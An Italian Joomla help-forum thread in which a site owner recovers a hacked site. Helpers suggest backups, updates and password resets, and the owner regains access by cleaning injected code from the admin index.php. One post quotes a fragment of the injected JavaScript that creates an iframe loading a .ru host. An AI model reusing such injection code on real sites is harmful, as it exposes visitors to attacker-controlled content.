[RISOLTO] Errore sicurezza malware + nuovo user per miracolo!

[smin]

Salve a tutti, è da circa 20 giorni che il mio sito www.ilcontemax.it ha iniziato a dare problemi!

Non riesco ad entrare nel sito tramite l'area administrator, è silurato come potenzialmente pericoloso visto la presenza di malware e dulcis in fundo sono entrato nel database tramite il programma mysql administrator sono andato a cercare gli user per risistemare le password e... voilà mi sono ritrovato una nuova stringa che vi riporto:

 id:44
Name; 'nekiua',
Username: 'mainaadmin'
email: 'ivan.kachelya@yandex.ru', '
Registrazione: '2013-12-16 18:33:38
Ultima visita: 2013-12-16 19:24:22'

Ho provato a modificare la pass del mio account ma lo stesso non riesco ad entrare in administrator e non riesco a capire il perchè!!!

Qualcuno sa cosa sia successo e cosa posso fare per salvare il sito senza cancellarlo?

Grazie a tutti!

[claudio65]

 Ciao smin,
ho  monitorato il tuo sito con 4 diversi servizi on line e 2 su quattro effettivamente  segnalano la presenza di malware.
La versione Joomla se non sbaglio è la 1.6 quindi  la prima considerazione è quella che necessita di un aggiornarlo alla versione Joomla 2.5.17.
Ma andiamo per ordine, in primo luogo essendo un sito piuttosto maturo immagino e mi auguro che tu possieda un backup del sito e del database.
A questo punto spazzerei via sito e database dal server e reinstallerei una la copia "pulita" del backup di entrambe.
In seconda battuta, vistosi che il tuo sito, mi pare di aver visto, non prevede nel frontend la registrazione degli utenti, andrei ad inibire tale possibilità tramite backend in gestione utenti --> opzioni .
Per completare l'opera e rendere il tuo sito meno vulnerabile procederei con gli aggiornamenti di Joomla per portarlo alla versione 2.5.17.
 
 

[mmleoni]

ciao smin,
 siccome io sono meno ottimista (o più realista) di claudio65, immagino che tu un backup aggiornato, ma neanche invecchiato, non ce lo abbia, sbaglio?

nel caso sia come detto sopra: che procedura hai seguito per recuperare la password?
(da db? hai controllato di essere superadmin?)

Nota 1:
il sito non lo puoi, o meglio non lo dovresti, recuperare ma puoi recuperarne i contenuti.

Nota 2:
non servono servizi online, a parte il banning di google, basta arrivare alla home e guardarne il sorgente.

ciao,
marco

[claudio65]

 Hai ragione Marco, sei più realista, ma un sito del 2012 avrà pure uno straccio di backup?
Bhe considerando che ad oggi il sito è in Joomla 1.6, se tanto mi da tanto direi che è realistico pensare non esista  backup
Lo scopriremo solo da smin !! 
 

[claudio65]

.

[claudio65]

Scusa Marco, scordavo, alla nota due intendi questo Javascript?

Codice: [Seleziona]

function gtkhjasd454hfhf235(){
        create_frame("http://ckidkina.ru/?id=ifrm");
 

[mmleoni]

intendo tutto lo script che si trova prima dell'apertura del tag html.

ps: joomla 1.7 è stato rilasciato a luglio 2011, vogliamo scommettere sull'età del sito?

ciao,
marco

[smin]

Prima di tutto grazie per l'interessamento, ve ne sono grato!!

Il backup... diciamo che ho un copia e incolla del sito, tramite ftp, e che ora sono nel mio hd esterno (però è vecchio di circa 1 anno).

Sono andato di nuovo nel database del sito tramite il programma che ho Mysqladministrator e non mi da più le tabelle del database per andare a controllare i privilegi degli user... ! Cmq ieri nessuno aveva privilegi tranne uno dove c'era scritto "deprecated".

Ho provato a recuperare la password inserendo email e user ma niente non mi è arrivato nulla!

Ultimo aggiornamento, il sito è offline e non riesco ad entrare neanche tramite ftp! mi da accesso negato!

[mmleoni]

1. password
per recuperare la password vedi qui:

www.joomla.it/mediawiki/index.php/Joomla!_2.5:Recupero_password_amministratore

suggerimento: se cambi la pwd e la mail del nuovo utente, quello è molto facile che sia un superadmin.


2. ftp
alcuni provider disabilitano l'ftp e devi essere tu ad attivarlo prima di usarlo. chiedi all'assistenza per questo e/o per reimpostare le pw.


3.sito
io lo vedo on line.

vedi questo e poi vediamo la strategia.

ciao,
marco

[smin]

Ho scritto all'assistenza e il sito è subito tornato on line...!!

Ora il problema è dato dal fatto che non riesco ad entrare ancora nel pannello administrator del sito ed ho anche modificato le password!

[mmleoni]

ah ecco, quello che avevi scritto prima non lo avevo proprio capito...

lo hai fatto seguendo le indicazioni del link che ti ho mandato? devi usare il 2° Modo: Reset della Password.
su quali utenti hai cambiato la password/email?

ciao,
marco

[mmleoni]

dimenticavo: controlla anche che il campo 'block' sia impostato a zero, se è uno l'utente è bloccato e non può accedere.

ciao

[smin]

ho cambiato username, password ed email a quelli dove in params c'è scritto admin!!

per quanto riguarda il block tutti e tre utenti sono impostati a 0!

Niente non entra in alcun modo nel pannello administrator!!!

Quello script che dicevate l'ho tolto dal file index.php e devo essere sincero si sono tolti alcuni errori di allineamento dei testi all'interno del sito!

[claudio65]

Ok Marco ho visto lo script che indichi 

In quanto alla scommessa, deduco che il sito è del 2012 dal fatto che il dominio è stato creato nel ottobre 2012 ma effettivamente la discrepanza temporale delle versioni Joomla sostiene la tua tesi, quindi non amando l'azzardo in nessun caso, tantomeno con chi ha le spalle molto ma molto più larghe delle mie, declino l'invito a scommettere.

[mmleoni]

@smin
non è che hai messo tre utenti con lo username 'admin', vero?

a questo punto dovresti assicurarti che il plugin authentication di joomla sia attivo e che il codice dello stesso non sia stato modificato.

senza accedere al sistema di più non so dirti.

@claudio65
chi non risica non rosica 

ciao

[smin]

@smin
non è che hai messo tre utenti con lo username 'admin', vero?

a questo punto dovresti assicurarti che il plugin authentication di joomla sia attivo e che il codice dello stesso non sia stato modificato.

senza accedere al sistema di più non so dirti.

@claudio65
chi non risica non rosica 

ciao

Dove vedo se il plugin authentication di joomla è attivo?
Ti ho mandato un mex in PM con un immagine di quello che visualizzo io!

[mmleoni]

nella  tabella #__extensions, name='plg_authentication_joomla'
deve essere
client_id = 0
enabled = 1
access = 1

mi pare, perché stiamo parlando di j1.6, per questo dicevo che a memoria e senza accesso è abbastanza dura... 

quanto alla immagine non vedo la pw, ma magari è solo nascosta dalle dimensioni della colonna.


 

[smin]

nella  tabella #__extensions, name='plg_authentication_joomla'
deve essere
client_id = 0
enabled = 1
access = 1

Questa stringa che hai scritto non riesco a trovarla nel database!

quanto alla immagine non vedo la pw, ma magari è solo nascosta dalle dimensioni della colonna.

per quanto riguarda la pass l'ho tolta perchè cmq stava su imageshake....

[mmleoni]

stiamo parlando di un sistema vecchio e di una versione di transizione, quindi non più in uso da tempo: potrebbe essere che quel plugin si chiamasse in modo diverso, io sinceramente non me lo ricordo.

a parte riprova la modifica della password facendo ben attenzione, non saprei più che dirti. 

ciao,
marco

[smin]

niente non va...

[claudio65]

 A questo punto vistosi che perlomeno possiedi un backup (copia del sito via FTP) e vistasi la relativa semplicità della struttura del sito, forse fai prima a rifarlo ex novo magari con Joomla 2.5.26 o Joomla 3.2.X
Dopo di ché ricordati di fare un backup del sito e del DB iniziale e uno ogni volta che apporti significative modifiche strutturali o di contenuti. Non di meno periodicamente sincerati che il core di Joomla e i vari componenti del sito siano sempre aggiornati, questo ti aiuterà a diminuire le possibilità di attacchi e nel malaugurato caso, avrai sempre un backup per ripristinare la situazione.
Guarda il bicchiere mezzo pieno e pensa che rifacendolo avrai un nuovo sito resposive che non è un plusvalore da poco 
 
A proposito, a titolo di curiosità, quando era stato fatto il sito?
 

[claudio65]

.

[mmleoni]

a questo punto devi valutare i costi benefici di continuare nel recupero piuttosto che rifare tutto ex novo.

i costi sono sostanzialmente il tempo che ci impieghi personalmente o il costo di un informatico che ti recuperi il sito (un giorno dovrebbe essere più che sufficiente per il recupero e per l'aggiornamento a 2.5.17, per la 3.x entra in ballo anche il discorso template e ...).

i benefici sono le informazioni che tu hai sul sito. quale sia la loro importanza e quanto valgano per te lo sai solo tu.


avevi parlato di avere un vecchio backup. un ultimo tentativo potrebbe essere quello di:

• fai il backup di file sysytem e db attuali (quelli sul server)
• carica i files (e solo quelli) del vecchio backup.
• prova ad accedere.

ATTENZIONE: questa è l'ultima risorsa, perché se il problema è nel db non risolvi niente, anzi potresti aver cancellato dati utili.

quindi pensa bene ai due punti di cui sopra prima di agire.

ciao,
marco

[claudio65]

Pardon, ho scritto Joomla 2.5.26 anziché 2.5.17 ma è chiaramente un lapis la ventisei più alcune patch  sono di Joomla 1.5

[smin]

Alcune volte le cose più idee più stupide risultano quelle più valide!

Prima di fare danni e copiare tutta la cartella di backup che avevo nel pc e trasferita tramite FTP, sono andato nella cartella administrator del sito ed ho notato con mio stupore che il file index.php portava anche lì uno strano codice....!
Visto che il pannello di controllo non mi dava errori dopo che inserivo le pass... ho pensato solo ad una cosa: quel file index non mi fa entrare nel sito! L'ho risistemato...... et voilà! L'errore è sparito e sono entrato nel backend del sito!
Ora aggiorno subito joomla, installo akeeba backup e picchio quello che mi ha hackerato il sito... 'tacci sua!

Vi chiedo due ultime cose poi metto "risolto" al topic:
1) come posso proteggere il mio sito per evitare che cose del genere avvengano di nuovo? anche se ho il dubbio che se aggiono joomla... il template non è compatibile!
2) come scopro dov'è il malvare nel sito?

[claudio65]

 Bene direi che possiamo gioire e poi oltre a portare un certo risultato l'idea non mi sembra tanto stupida 
In merito alle tue domande , sicuramente Marco saprà darti indicazioni più precise di quanto possa dartene io, comunque in riguardo alla protezione del sito, la prima cosa da farsi è tenere sempre aggiornata la versione di Joomla , i componenti, i moduli e i plugin. Il backup periodico è sempre salutare e foriero di vantaggi anche in questi casi.
In quanto a scoprire nel sito il malware non saprei indicarti una tecnica precisa, personalmente in passato  ho subito un attacco simile che in pratica aveva  inquinato tutti i file index.php  del sito. Dopo l'identificazione e l'eliminazione dello script maligno causa dell'inquinamento, avevo posto rimedio sostituendo  i files index.php con quelli di un backup pulito. Ma nel tuo caso bisogna capire prima se la cosa si limita ai files index.php o ha interessato anche il DB che sarebbe a mio avviso molto più problematico.
 

[mmleoni]

per la prima domanda vale la risposta di claudio65.

2) come scopro dov'è il malvare nel sito?

non puoi e non potrai mai sapere che cosa c'è ora in quel sito se non analizzando ad uno ad uno tutte le migliaia di file contenuti, e qui si torna al mio post di inizio.

so che non ci sentite mai da questo orecchio ma è così, punto e basta.
Puoi recuperare db ed immagini e trasferirle su una installazione nuova 'gemella', come descritto in innumerevoli altri topic. leggi quelli di apertura della sezione.

ciao,
marco

[smin]

Grazie ad entrambi per l'aiuto!!! 


Questo topic si può chiudere!!!